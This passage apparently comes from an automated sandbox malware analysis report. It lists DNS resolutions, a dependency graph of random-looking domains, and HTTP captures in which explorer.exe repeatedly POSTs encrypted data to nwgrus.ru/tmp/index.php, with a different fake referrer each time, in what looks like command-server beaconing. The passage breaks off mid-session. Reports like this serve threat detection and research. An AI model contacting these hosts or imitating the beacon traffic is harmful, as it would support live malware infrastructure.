                                                                                                      Oct 8, 2024 00:19:55.727994919 CEST1.1.1.1192.168.2.40x7a5eNo error (0)nwgrus.ru190.219.117.240A (IP address)IN (0x0001)false
                                                                                                      Oct 8, 2024 00:19:55.727994919 CEST1.1.1.1192.168.2.40x7a5eNo error (0)nwgrus.ru187.211.161.52A (IP address)IN (0x0001)false
                                                                                                      Oct 8, 2024 00:19:55.727994919 CEST1.1.1.1192.168.2.40x7a5eNo error (0)nwgrus.ru154.144.253.197A (IP address)IN (0x0001)false
                                                                                                      Oct 8, 2024 00:19:55.728008986 CEST1.1.1.1192.168.2.40x7a5eNo error (0)nwgrus.ru109.175.29.39A (IP address)IN (0x0001)false
                                                                                                      Oct 8, 2024 00:19:55.728008986 CEST1.1.1.1192.168.2.40x7a5eNo error (0)nwgrus.ru185.18.245.58A (IP address)IN (0x0001)false
                                                                                                      Oct 8, 2024 00:19:55.728008986 CEST1.1.1.1192.168.2.40x7a5eNo error (0)nwgrus.ru190.147.128.172A (IP address)IN (0x0001)false
                                                                                                      Oct 8, 2024 00:19:55.728008986 CEST1.1.1.1192.168.2.40x7a5eNo error (0)nwgrus.ru220.125.3.190A (IP address)IN (0x0001)false
                                                                                                      Oct 8, 2024 00:19:55.728008986 CEST1.1.1.1192.168.2.40x7a5eNo error (0)nwgrus.ru123.213.233.131A (IP address)IN (0x0001)false
                                                                                                      Oct 8, 2024 00:19:55.728008986 CEST1.1.1.1192.168.2.40x7a5eNo error (0)nwgrus.ru190.249.249.14A (IP address)IN (0x0001)false
                                                                                                      Oct 8, 2024 00:19:55.728008986 CEST1.1.1.1192.168.2.40x7a5eNo error (0)nwgrus.ru186.123.165.48A (IP address)IN (0x0001)false
                                                                                                      Oct 8, 2024 00:19:55.728008986 CEST1.1.1.1192.168.2.40x7a5eNo error (0)nwgrus.ru190.219.117.240A (IP address)IN (0x0001)false
                                                                                                      Oct 8, 2024 00:19:55.728008986 CEST1.1.1.1192.168.2.40x7a5eNo error (0)nwgrus.ru187.211.161.52A (IP address)IN (0x0001)false
                                                                                                      Oct 8, 2024 00:19:55.728008986 CEST1.1.1.1192.168.2.40x7a5eNo error (0)nwgrus.ru154.144.253.197A (IP address)IN (0x0001)false
                                                                                                      Oct 8, 2024 00:19:55.728013039 CEST1.1.1.1192.168.2.40x7a5eNo error (0)nwgrus.ru109.175.29.39A (IP address)IN (0x0001)false
                                                                                                      Oct 8, 2024 00:19:55.728013039 CEST1.1.1.1192.168.2.40x7a5eNo error (0)nwgrus.ru185.18.245.58A (IP address)IN (0x0001)false
                                                                                                      Oct 8, 2024 00:19:55.728013039 CEST1.1.1.1192.168.2.40x7a5eNo error (0)nwgrus.ru190.147.128.172A (IP address)IN (0x0001)false
                                                                                                      Oct 8, 2024 00:19:55.728013039 CEST1.1.1.1192.168.2.40x7a5eNo error (0)nwgrus.ru220.125.3.190A (IP address)IN (0x0001)false
                                                                                                      Oct 8, 2024 00:19:55.728013039 CEST1.1.1.1192.168.2.40x7a5eNo error (0)nwgrus.ru123.213.233.131A (IP address)IN (0x0001)false
                                                                                                      Oct 8, 2024 00:19:55.728013039 CEST1.1.1.1192.168.2.40x7a5eNo error (0)nwgrus.ru190.249.249.14A (IP address)IN (0x0001)false
                                                                                                      Oct 8, 2024 00:19:55.728013039 CEST1.1.1.1192.168.2.40x7a5eNo error (0)nwgrus.ru186.123.165.48A (IP address)IN (0x0001)false
                                                                                                      Oct 8, 2024 00:19:55.728013039 CEST1.1.1.1192.168.2.40x7a5eNo error (0)nwgrus.ru190.219.117.240A (IP address)IN (0x0001)false
                                                                                                      Oct 8, 2024 00:19:55.728013039 CEST1.1.1.1192.168.2.40x7a5eNo error (0)nwgrus.ru187.211.161.52A (IP address)IN (0x0001)false
                                                                                                      Oct 8, 2024 00:19:55.728013039 CEST1.1.1.1192.168.2.40x7a5eNo error (0)nwgrus.ru154.144.253.197A (IP address)IN (0x0001)false
                                                                                                      Oct 8, 2024 00:20:22.805046082 CEST1.1.1.1192.168.2.40x809aNo error (0)shed.dual-low.s-part-0017.t-0009.t-msedge.nets-part-0017.t-0009.t-msedge.netCNAME (Canonical name)IN (0x0001)false
                                                                                                      Oct 8, 2024 00:20:22.805046082 CEST1.1.1.1192.168.2.40x809aNo error (0)s-part-0017.t-0009.t-msedge.net13.107.246.45A (IP address)IN (0x0001)false
                                                                                                      Oct 8, 2024 00:20:41.782227993 CEST1.1.1.1192.168.2.40x1e50No error (0)ninjahallnews.com23.145.40.168A (IP address)IN (0x0001)false
                                                                                                      Oct 8, 2024 00:22:28.574058056 CEST1.1.1.1192.168.2.40x478bNo error (0)nwgrus.ru211.171.233.129A (IP address)IN (0x0001)false
                                                                                                      Oct 8, 2024 00:22:28.574058056 CEST1.1.1.1192.168.2.40x478bNo error (0)nwgrus.ru189.143.207.58A (IP address)IN (0x0001)false
                                                                                                      Oct 8, 2024 00:22:28.574058056 CEST1.1.1.1192.168.2.40x478bNo error (0)nwgrus.ru181.28.104.6A (IP address)IN (0x0001)false
                                                                                                      Oct 8, 2024 00:22:28.574058056 CEST1.1.1.1192.168.2.40x478bNo error (0)nwgrus.ru190.224.203.37A (IP address)IN (0x0001)false
                                                                                                      Oct 8, 2024 00:22:28.574058056 CEST1.1.1.1192.168.2.40x478bNo error (0)nwgrus.ru181.52.122.51A (IP address)IN (0x0001)false
                                                                                                      Oct 8, 2024 00:22:28.574058056 CEST1.1.1.1192.168.2.40x478bNo error (0)nwgrus.ru130.204.29.121A (IP address)IN (0x0001)false
                                                                                                      Oct 8, 2024 00:22:28.574058056 CEST1.1.1.1192.168.2.40x478bNo error (0)nwgrus.ru2.185.214.11A (IP address)IN (0x0001)false
                                                                                                      Oct 8, 2024 00:22:28.574058056 CEST1.1.1.1192.168.2.40x478bNo error (0)nwgrus.ru212.112.110.243A (IP address)IN (0x0001)false
                                                                                                      Oct 8, 2024 00:22:28.574058056 CEST1.1.1.1192.168.2.40x478bNo error (0)nwgrus.ru46.100.50.5A (IP address)IN (0x0001)false
                                                                                                      Oct 8, 2024 00:22:28.574058056 CEST1.1.1.1192.168.2.40x478bNo error (0)nwgrus.ru123.213.233.131A (IP address)IN (0x0001)false

                                                                                                      HTTP Request Dependency Graph

                                                                                                      • 23.145.40.164
                                                                                                      • https:
                                                                                                        • ninjahallnews.com
                                                                                                      • fopeiyjgdmtd.com
                                                                                                        • nwgrus.ru
                                                                                                      • bwtyrvoeqafgvbf.net
                                                                                                      • xghchnsekruohq.net
                                                                                                      • sexbgcirilxygdjd.net
                                                                                                      • iahhcvfewaqau.net
                                                                                                      • eqcqgpejtwdt.net
                                                                                                      • wecknsvepmdnww.com
                                                                                                      • bhtdcxedsrrbqyo.net
                                                                                                      • fdkltibbufmpdfhy.org
                                                                                                      • xbdoluaokmu.org
                                                                                                      • ayakqtnprwclxx.com
                                                                                                      • iplbmyqhcsowave.com
                                                                                                      • rdhamasxmtwwkau.com
                                                                                                      • floxumtvcvrlyy.org
                                                                                                      • mjtfeuwpovhathn.org
                                                                                                      • nggsthvsetexec.org
                                                                                                      • lrkgjwlbfxyrmp.com
                                                                                                      • wvxsqrgovrq.net
                                                                                                      • ivjlkhscvhyfno.org
                                                                                                      • gwvqwjkmpeg.org
                                                                                                      • cqnqsxdlukmk.org
                                                                                                      • dlawyaqdtqgx.net
                                                                                                      • gxrfdgbwqcu.net
                                                                                                      • mihbhgkrdwqnogym.com
                                                                                                      • bhprxmbpfsifjwvd.com
                                                                                                      • vqoayhqrgjlg.com
                                                                                                      • cmfmcxiuegbxwbfb.org
                                                                                                      • bojujhdxlnt.net
                                                                                                      • lbaiglgwxhkmq.net
                                                                                                      • oxivfaqdhau.net
                                                                                                      • eihcpyqadleca.net
                                                                                                      • olgjjvecsjugbyj.com
                                                                                                      • wjiuupaachvppk.com
                                                                                                      • csuhbuxabuhlm.org
                                                                                                      • lixbbuexbbyxijy.com
                                                                                                      • snydbdaflsjf.net
                                                                                                      • toxykxlssds.com
                                                                                                      • wujymmrsholuwdm.com
                                                                                                      • anhllontjkcoc.org
                                                                                                      • dfdglghjacuv.net
                                                                                                      • efoitwxyetuahvcx.com
                                                                                                      • wgvksgwflrvxis.org

                                                                                                      HTTP Packets

                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      0192.168.2.449736109.175.29.39802580C:\Windows\explorer.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Oct 8, 2024 00:19:55.737164021 CEST279OUTPOST /tmp/index.php HTTP/1.1
                                                                                                      Connection: Keep-Alive
                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                      Accept: */*
                                                                                                      Referer: http://fopeiyjgdmtd.com/
                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                      Content-Length: 244
                                                                                                      Host: nwgrus.ru
                                                                                                      Oct 8, 2024 00:19:55.737196922 CEST244OUTData Raw: 3b 6e 50 11 f1 cb 1a 55 dd ae c6 70 73 09 7a ce 0b 02 c1 97 1e 07 92 11 08 7a 78 97 47 c5 b2 6b 98 5b b6 2e 75 1a 27 1d 9b 96 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2e 5b 0a 6b 2c 90 f4 76 0b 75 5a 24 a6 a3
                                                                                                      Data Ascii: ;nPUpszzxGk[.u'? 9Yt M@NA .[k,vuZ$mqtq]HR\W|\$<1,L":Dd^\{I4@yw7ql|*X,au{<pg~BMd
                                                                                                      Oct 8, 2024 00:19:56.520555973 CEST152INHTTP/1.1 404 Not Found
                                                                                                      Server: nginx/1.26.0
                                                                                                      Date: Mon, 07 Oct 2024 22:19:56 GMT
                                                                                                      Content-Type: text/html; charset=utf-8
                                                                                                      Connection: close
                                                                                                      Data Raw: 04 00 00 00 72 e8 87 ed
                                                                                                      Data Ascii: r


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      1192.168.2.449737109.175.29.39802580C:\Windows\explorer.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Oct 8, 2024 00:19:57.174031019 CEST282OUTPOST /tmp/index.php HTTP/1.1
                                                                                                      Connection: Keep-Alive
                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                      Accept: */*
                                                                                                      Referer: http://bwtyrvoeqafgvbf.net/
                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                      Content-Length: 300
                                                                                                      Host: nwgrus.ru
                                                                                                      Oct 8, 2024 00:19:57.174042940 CEST300OUTData Raw: 3b 6e 50 11 f1 cb 1a 55 dd ae c6 70 73 09 7a ce 0b 02 c1 97 1e 07 92 11 08 7a 78 97 47 c5 b2 6b 98 5b b6 2e 75 1a 27 1d 9b 96 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2d 5b 0a 6b 2c 90 f5 76 0b 75 3d 00 dd e8
                                                                                                      Data Ascii: ;nPUpszzxGk[.u'? 9Yt M@NA -[k,vu=k;lCN9>s:.f/Zc3`5$@(&+Vk.$y~;j+P=(l."jHWpyv$cmbeA.B7
                                                                                                      Oct 8, 2024 00:19:57.933917046 CEST484INHTTP/1.1 404 Not Found
                                                                                                      Server: nginx/1.26.0
                                                                                                      Date: Mon, 07 Oct 2024 22:19:57 GMT
                                                                                                      Content-Type: text/html; charset=utf-8
                                                                                                      Connection: close
                                                                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED]
                                                                                                      Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      2192.168.2.449738109.175.29.39802580C:\Windows\explorer.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Oct 8, 2024 00:19:57.944235086 CEST281OUTPOST /tmp/index.php HTTP/1.1
                                                                                                      Connection: Keep-Alive
                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                      Accept: */*
                                                                                                      Referer: http://xghchnsekruohq.net/
                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                      Content-Length: 111
                                                                                                      Host: nwgrus.ru
                                                                                                      Oct 8, 2024 00:19:57.944255114 CEST111OUTData Raw: 3b 6e 50 11 f1 cb 1a 55 dd ae c6 70 73 09 7a ce 0b 02 c1 97 1e 07 92 11 08 7a 78 97 47 c5 b2 6b 98 5b b6 2e 75 1a 27 1d 9b 96 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2d 5b 0b 6b 2c 90 f5 76 0b 75 66 33 a8 a3
                                                                                                      Data Ascii: ;nPUpszzxGk[.u'? 9Yt M@NA -[k,vuf3EEPSR]
                                                                                                      Oct 8, 2024 00:19:58.701877117 CEST484INHTTP/1.1 404 Not Found
                                                                                                      Server: nginx/1.26.0
                                                                                                      Date: Mon, 07 Oct 2024 22:19:58 GMT
                                                                                                      Content-Type: text/html; charset=utf-8
                                                                                                      Connection: close
                                                                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED]
                                                                                                      Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      3192.168.2.449739109.175.29.39802580C:\Windows\explorer.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Oct 8, 2024 00:19:58.710067034 CEST283OUTPOST /tmp/index.php HTTP/1.1
                                                                                                      Connection: Keep-Alive
                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                      Accept: */*
                                                                                                      Referer: http://sexbgcirilxygdjd.net/
                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                      Content-Length: 362
                                                                                                      Host: nwgrus.ru
                                                                                                      Oct 8, 2024 00:19:58.710134983 CEST362OUTData Raw: 3b 6e 50 11 f1 cb 1a 55 dd ae c6 70 73 09 7a ce 0b 02 c1 97 1e 07 92 11 08 7a 78 97 47 c5 b2 6b 98 5b b6 2e 75 1a 27 1d 9b 96 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2d 5b 08 6b 2c 90 f5 76 0b 75 53 38 ae 84
                                                                                                      Data Ascii: ;nPUpszzxGk[.u'? 9Yt M@NA -[k,vuS8VJMLq$Y ~/<j."<cD$[|@cMWc^I\LL7`hU<,=chqkc9k(
                                                                                                      Oct 8, 2024 00:19:59.466635942 CEST137INHTTP/1.1 200 OK
                                                                                                      Server: nginx/1.26.0
                                                                                                      Date: Mon, 07 Oct 2024 22:19:59 GMT
                                                                                                      Content-Type: text/html; charset=utf-8
                                                                                                      Connection: close


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      4192.168.2.449740109.175.29.39802580C:\Windows\explorer.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Oct 8, 2024 00:19:59.474740028 CEST280OUTPOST /tmp/index.php HTTP/1.1
                                                                                                      Connection: Keep-Alive
                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                      Accept: */*
                                                                                                      Referer: http://iahhcvfewaqau.net/
                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                      Content-Length: 159
                                                                                                      Host: nwgrus.ru
                                                                                                      Oct 8, 2024 00:19:59.474785089 CEST159OUTData Raw: 3b 6e 50 11 f1 cb 1a 55 dd ae c6 70 73 09 7a ce 0b 02 c1 97 1e 07 92 11 08 7a 78 97 47 c5 b2 6b 98 5b b6 2e 75 1a 27 1d 9b 96 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2d 5b 09 6b 2c 90 f5 76 0b 75 4c 1d ab b9
                                                                                                      Data Ascii: ;nPUpszzxGk[.u'? 9Yt M@NA -[k,vuLliJ]rV^usj}@BJ,%BM:"}nE
                                                                                                      Oct 8, 2024 00:20:00.843122959 CEST484INHTTP/1.1 404 Not Found
                                                                                                      Server: nginx/1.26.0
                                                                                                      Date: Mon, 07 Oct 2024 22:20:00 GMT
                                                                                                      Content-Type: text/html; charset=utf-8
                                                                                                      Connection: close
                                                                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED]
                                                                                                      Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      5192.168.2.449741109.175.29.39802580C:\Windows\explorer.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Oct 8, 2024 00:20:00.851763964 CEST279OUTPOST /tmp/index.php HTTP/1.1
                                                                                                      Connection: Keep-Alive
                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                      Accept: */*
                                                                                                      Referer: http://eqcqgpejtwdt.net/
                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                      Content-Length: 197
                                                                                                      Host: nwgrus.ru
                                                                                                      Oct 8, 2024 00:20:00.851783991 CEST197OUTData Raw: 3b 6e 50 11 f1 cb 1a 55 dd ae c6 70 73 09 7a ce 0b 02 c1 97 1e 07 92 11 08 7a 78 97 47 c5 b2 6b 98 5b b6 2e 75 1a 27 1d 9b 96 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2d 5b 0e 6b 2c 90 f5 76 0b 75 2b 3f a8 83
                                                                                                      Data Ascii: ;nPUpszzxGk[.u'? 9Yt M@NA -[k,vu+?0]~v=4=p*6M>f;Q8'IS6\do!JcbCFd!0n"l
                                                                                                      Oct 8, 2024 00:20:01.602030993 CEST137INHTTP/1.1 200 OK
                                                                                                      Server: nginx/1.26.0
                                                                                                      Date: Mon, 07 Oct 2024 22:20:01 GMT
                                                                                                      Content-Type: text/html; charset=utf-8
                                                                                                      Connection: close


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      6192.168.2.449742109.175.29.39802580C:\Windows\explorer.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Oct 8, 2024 00:20:01.611601114 CEST281OUTPOST /tmp/index.php HTTP/1.1
                                                                                                      Connection: Keep-Alive
                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                      Accept: */*
                                                                                                      Referer: http://wecknsvepmdnww.com/
                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                      Content-Length: 118
                                                                                                      Host: nwgrus.ru
                                                                                                      Oct 8, 2024 00:20:01.611614943 CEST118OUTData Raw: 3b 6e 50 11 f1 cb 1a 55 dd ae c6 70 73 09 7a ce 0b 02 c1 97 1e 07 92 11 08 7a 78 97 47 c5 b2 6b 98 5b b6 2e 75 1a 27 1d 9b 96 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2d 5b 0f 6b 2c 90 f5 76 0b 75 4a 21 ef 81
                                                                                                      Data Ascii: ;nPUpszzxGk[.u'? 9Yt M@NA -[k,vuJ!!e|v>EaRFaEaS[
                                                                                                      Oct 8, 2024 00:20:02.372348070 CEST137INHTTP/1.1 200 OK
                                                                                                      Server: nginx/1.26.0
                                                                                                      Date: Mon, 07 Oct 2024 22:20:02 GMT
                                                                                                      Content-Type: text/html; charset=utf-8
                                                                                                      Connection: close


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      7192.168.2.449743109.175.29.39802580C:\Windows\explorer.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Oct 8, 2024 00:20:02.449340105 CEST282OUTPOST /tmp/index.php HTTP/1.1
                                                                                                      Connection: Keep-Alive
                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                      Accept: */*
                                                                                                      Referer: http://bhtdcxedsrrbqyo.net/
                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                      Content-Length: 125
                                                                                                      Host: nwgrus.ru
                                                                                                      Oct 8, 2024 00:20:02.449341059 CEST125OUTData Raw: 3b 6e 50 11 f1 cb 1a 55 dd ae c6 70 73 09 7a ce 0b 02 c1 97 1e 07 92 11 08 7a 78 97 47 c5 b2 6b 98 5b b6 2e 75 1a 27 1d 9b 96 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2d 5b 0c 6b 2c 90 f5 76 0b 75 60 58 b4 84
                                                                                                      Data Ascii: ;nPUpszzxGk[.u'? 9Yt M@NA -[k,vu`Xt7SXhWP*:&`3
                                                                                                      Oct 8, 2024 00:20:03.356353045 CEST484INHTTP/1.1 404 Not Found
                                                                                                      Server: nginx/1.26.0
                                                                                                      Date: Mon, 07 Oct 2024 22:20:03 GMT
                                                                                                      Content-Type: text/html; charset=utf-8
                                                                                                      Connection: close
                                                                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED]
                                                                                                      Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      8192.168.2.449744109.175.29.39802580C:\Windows\explorer.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Oct 8, 2024 00:20:03.457595110 CEST283OUTPOST /tmp/index.php HTTP/1.1
                                                                                                      Connection: Keep-Alive
                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                      Accept: */*
                                                                                                      Referer: http://fdkltibbufmpdfhy.org/
                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                      Content-Length: 188
                                                                                                      Host: nwgrus.ru
